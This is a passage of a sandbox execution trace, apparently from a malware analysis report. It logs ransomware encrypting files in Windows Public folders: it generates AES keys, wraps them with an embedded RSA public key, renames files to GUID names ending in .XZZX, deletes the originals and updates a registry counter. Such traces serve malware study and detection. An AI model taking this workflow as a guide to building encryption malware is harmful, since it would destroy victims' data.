(normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini")) returned 1 [0146.389] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini")) returned 0 Thread: id = 523 os_tid = 0xb8c [0146.057] lstrcpyA (in: lpString1=0x465fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.057] lstrcpyW (in: lpString1=0x465f460, lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="win7_scenic-demoshort_raw.wtv") returned="win7_scenic-demoshort_raw.wtv" [0146.057] lstrcpyW (in: lpString1=0x465e860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0146.057] SetErrorMode (uMode=0x1) returned 0x1 [0146.057] lstrcpyW (in: lpString1=0x465f860, lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="win7_scenic-demoshort_raw.wtv") returned="win7_scenic-demoshort_raw.wtv" [0146.057] CoCreateGuid (in: pguid=0x465e440 | out: pguid=0x465e440*(Data1=0x6d9ae66f, Data2=0x4a71, Data3=0x43df, Data4=([0]=0xbe, [1]=0xa4, [2]=0xb9, [3]=0x1c, [4]=0xd9, [5]=0x90, [6]=0x84, [7]=0x42))) returned 0x0 [0146.057] wsprintfW (in: param_1=0x465ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0146.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x465fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0146.057] wsprintfW (in: param_1=0x465e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX") returned 82 [0146.057] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="XZZX") returned 0x0 [0146.057] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", dwFileAttributes=0x20) returned 1 [0146.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0146.058] CreateFileMappingW (hFile=0x8fc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x900 [0146.058] MapViewOfFile (hFileMappingObject=0x900, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x4f60000 [0146.059] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4120000 [0146.060] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4130000 [0146.060] SetErrorMode (uMode=0x1) returned 0x1 [0146.060] lstrcpyW (in: lpString1=0x465e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0146.060] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a7a0) returned 1 [0146.063] CryptGenKey (in: hProv=0x437a7a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372038) returned 1 [0146.381] CryptExportKey (in: hKey=0x4372038, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x465e420 | out: pbData=0x0*, pdwDataLen=0x465e420*=0x94) returned 1 [0146.381] CryptExportKey (in: hKey=0x4372038, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4130000, pdwDataLen=0x465e420 | out: pbData=0x4130000*, pdwDataLen=0x465e420*=0x94) returned 1 [0146.381] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.382] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.382] CryptDestroyKey (hKey=0x4372038) returned 1 [0146.382] CryptReleaseContext (hProv=0x437a7a0, dwFlags=0x0) returned 0 [0147.065] UnmapViewOfFile (lpBaseAddress=0x4f60000) returned 1 [0147.081] CloseHandle (hObject=0x900) returned 1 [0147.082] SetFilePointer (in: hFile=0x8fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x940000 [0147.082] WriteFile (in: hFile=0x8fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x465e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x465e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.082] SetFilePointer (in: hFile=0x8fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x940005 [0147.082] WriteFile (in: hFile=0x8fc, lpBuffer=0x465f860*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x465e42c, lpOverlapped=0x0 | out: lpBuffer=0x465f860*, lpNumberOfBytesWritten=0x465e42c*=0x3a, lpOverlapped=0x0) returned 1 [0147.082] SetFilePointer (in: hFile=0x8fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x94003f [0147.082] WriteFile (in: hFile=0x8fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x465e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x465e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.083] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.083] SetErrorMode (uMode=0x1) returned 0x1 [0147.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0147.083] OutputDebugStringW (lpOutputString="end") [0147.083] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õe\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x465dbf4, pcbBinary=0x465d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x465dbf4, pcbBinary=0x465d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0147.083] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x465dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x465d3dc, pcbStructInfo=0x465d3d8 | out: pvStructInfo=0x465d3dc, pcbStructInfo=0x465d3d8) returned 1 [0147.083] CryptAcquireContextW (in: phProv=0x465d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x465d3e4*=0x3cc1210) returned 1 [0147.084] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1210, dwCertEncodingType=0x1, pInfo=0x3cf26f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2728*, PublicKey.cUnusedBits=0x0), phKey=0x465d3ec | out: phKey=0x465d3ec*=0x43720b8) returned 1 [0147.085] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0147.085] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0147.085] CryptEncrypt (in: hKey=0x43720b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x465d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x465d3f0*=0x80) returned 1 [0147.085] CryptEncrypt (in: hKey=0x43720b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1298*, pdwDataLen=0x465d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1298*, pdwDataLen=0x465d3e8*=0x80) returned 1 [0147.085] OutputDebugStringW (lpOutputString="Ȇ") [0147.086] WriteFile (in: hFile=0x8fc, lpBuffer=0x3cc1298*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x465e42c, lpOverlapped=0x0 | out: lpBuffer=0x3cc1298*, lpNumberOfBytesWritten=0x465e42c*=0x80, lpOverlapped=0x0) returned 1 [0147.086] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.086] WriteFile (in: hFile=0x8fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x465e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x465e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.086] CloseHandle (hObject=0x8fc) returned 1 [0147.086] VirtualFree (lpAddress=0x4120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.086] VirtualFree (lpAddress=0x4130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.087] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" (normalized: "c:\\users\\public\\recorded tv\\sample media\\27fbccff13bc6b6f6d9ae66f18224fb7.xzzx"), dwFlags=0x1) returned 1 [0147.087] GetUserNameW (in: lpBuffer=0x465e1f8, pcbBuffer=0x465dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x465dfe0) returned 1 [0147.087] wsprintfW (in: param_1=0x465dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0147.088] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x465dfe4 | out: phkResult=0x465dfe4*=0x8fc) returned 0x0 [0147.088] RegQueryValueExW (in: hKey=0x8fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x465dfd8, lpData=0x465dfec, lpcbData=0x465dfdc*=0x4 | out: lpType=0x465dfd8*=0x4, lpData=0x465dfec*=0xdc, lpcbData=0x465dfdc*=0x4) returned 0x0 [0147.088] RegCloseKey (hKey=0x8fc) returned 0x0 [0147.088] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x465dfe8 | out: phkResult=0x465dfe8*=0x8fc) returned 0x0 [0147.088] RegSetValueExW (in: hKey=0x8fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x465dfec*=0xdd, cbData=0x4 | out: lpData=0x465dfec*=0xdd) returned 0x0 [0147.088] RegCloseKey (hKey=0x8fc) returned 0x0 Thread: id = 524 os_tid = 0xb90 [0146.390] lstrcpyA (in: lpString1=0x475fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.390] lstrcpyW (in: lpString1=0x475f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.390] lstrcpyW (in: lpString1=0x475e860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\" [0146.390] SetErrorMode (uMode=0x1) returned 0x1 [0146.390] lstrcpyW (in: lpString1=0x475f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.390] CoCreateGuid (in: pguid=0x475e440 | out: pguid=0x475e440*(Data1=0xe19e3609, Data2=0xa024, Data3=0x404e, Data4=([0]=0x92, [1]=0xbe, [2]=0x81, [3]=0xf1, [4]=0x43, [5]=0xf3, [6]=0xc, [7]=0x24))) returned 0x0 [0146.390] wsprintfW (in: param_1=0x475ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0146.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x475fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0146.390] wsprintfW (in: param_1=0x475e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\9C0539442839CAF8E19E36092CAFAF40.XZZX") returned 64 [0146.390] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0146.390] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x20) returned 1 [0146.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0146.391] ReadFile (in: hFile=0x88c, lpBuffer=0x4378408, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x475e418, lpOverlapped=0x0 | out: lpBuffer=0x4378408*, lpNumberOfBytesRead=0x475e418*=0x17c, lpOverlapped=0x0) returned 1 [0146.391] CloseHandle (hObject=0x88c) returned 1 [0146.391] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0146.392] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0146.392] SetErrorMode (uMode=0x1) returned 0x1 [0146.392] lstrcpyW (in: lpString1=0x475e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0146.392] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437aa48) returned 1 [0146.395] CryptGenKey (in: hProv=0x437aa48, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4371ff8) returned 1 [0146.648] CryptExportKey (in: hKey=0x4371ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x475e41c | out: pbData=0x0*, pdwDataLen=0x475e41c*=0x94) returned 1 [0146.648] CryptExportKey (in: hKey=0x4371ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x475e41c | out: pbData=0x40a0000*, pdwDataLen=0x475e41c*=0x94) returned 1 [0146.648] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.649] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.649] CryptDestroyKey (hKey=0x4371ff8) returned 1 [0146.649] CryptReleaseContext (hProv=0x437aad0, dwFlags=0x0) returned 0 [0146.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\9C0539442839CAF8E19E36092CAFAF40.XZZX" (normalized: "c:\\users\\public\\videos\\9c0539442839caf8e19e36092cafaf40.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0146.693] WriteFile (in: hFile=0x924, lpBuffer=0x4378408*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x4378408*, lpNumberOfBytesWritten=0x475e438*=0x17c, lpOverlapped=0x0) returned 1 [0146.693] SetFilePointer (in: hFile=0x924, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17c [0146.694] WriteFile (in: hFile=0x924, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x475e438*=0x5, lpOverlapped=0x0) returned 1 [0146.694] SetFilePointer (in: hFile=0x924, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x181 [0146.694] WriteFile (in: hFile=0x924, lpBuffer=0x475f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x475f860*, lpNumberOfBytesWritten=0x475e438*=0x16, lpOverlapped=0x0) returned 1 [0146.694] SetFilePointer (in: hFile=0x924, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0146.694] WriteFile (in: hFile=0x924, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x475e438*=0x5, lpOverlapped=0x0) returned 1 [0146.694] SetFilePointer (in: hFile=0x924, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19c [0146.694] SetErrorMode (uMode=0x1) returned 0x1 [0146.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0146.694] OutputDebugStringW (lpOutputString="end") [0146.694] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õu\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x475dbf4, pcbBinary=0x475d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x475dbf4, pcbBinary=0x475d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0146.694] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x475dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x475d3dc, pcbStructInfo=0x475d3d8 | out: pvStructInfo=0x475d3dc, pcbStructInfo=0x475d3d8) returned 1 [0146.694] CryptAcquireContextW (in: phProv=0x475d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x475d3e4*=0x437ab58) returned 1 [0146.695] CryptImportPublicKeyInfo (in: hCryptProv=0x437ab58, dwCertEncodingType=0x1, pInfo=0x437e048*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e078*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e080*, PublicKey.cUnusedBits=0x0), phKey=0x475d3ec | out: phKey=0x475d3ec*=0x4371ff8) returned 1 [0146.695] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.696] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0146.696] CryptEncrypt (in: hKey=0x4371ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x475d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x475d3f0*=0x80) returned 1 [0146.696] CryptEncrypt (in: hKey=0x4371ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437abe0*, pdwDataLen=0x475d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437abe0*, pdwDataLen=0x475d3e8*=0x80) returned 1 [0146.696] WriteFile (in: hFile=0x924, lpBuffer=0x437abe0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x437abe0*, lpNumberOfBytesWritten=0x475e438*=0x80, lpOverlapped=0x0) returned 1 [0146.696] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0146.696] WriteFile (in: hFile=0x924, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x475e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x475e438*=0x5, lpOverlapped=0x0) returned 1 [0146.696] GetUserNameW (in: lpBuffer=0x475e1f8, pcbBuffer=0x475dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x475dfe0) returned 1 [0146.696] wsprintfW (in: param_1=0x475dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0146.696] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x475dfe4 | out: phkResult=0x475dfe4*=0x928) returned 0x0 [0146.697] RegQueryValueExW (in: hKey=0x928, lpValueName="E1010314", lpReserved=0x0, lpType=0x475dfd8, lpData=0x475dfec, lpcbData=0x475dfdc*=0x4 | out: lpType=0x475dfd8*=0x4, lpData=0x475dfec*=0xd9, lpcbData=0x475dfdc*=0x4) returned 0x0 [0146.697] RegCloseKey (hKey=0x928) returned 0x0 [0146.697] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x475dfe8 | out: phkResult=0x475dfe8*=0x928) returned 0x0 [0146.697] RegSetValueExW (in: hKey=0x928, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x475dfec*=0xda, cbData=0x4 | out: lpData=0x475dfec*=0xda) returned 0x0 [0146.697] RegCloseKey (hKey=0x928) returned 0x0 [0146.697] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.697] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.697] CloseHandle (hObject=0x924) returned 1 [0146.698] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0146.699] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0146.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0146.700] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0 Thread: id = 525 os_tid = 0xb94 [0146.524] lstrcpyA (in: lpString1=0x42bfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 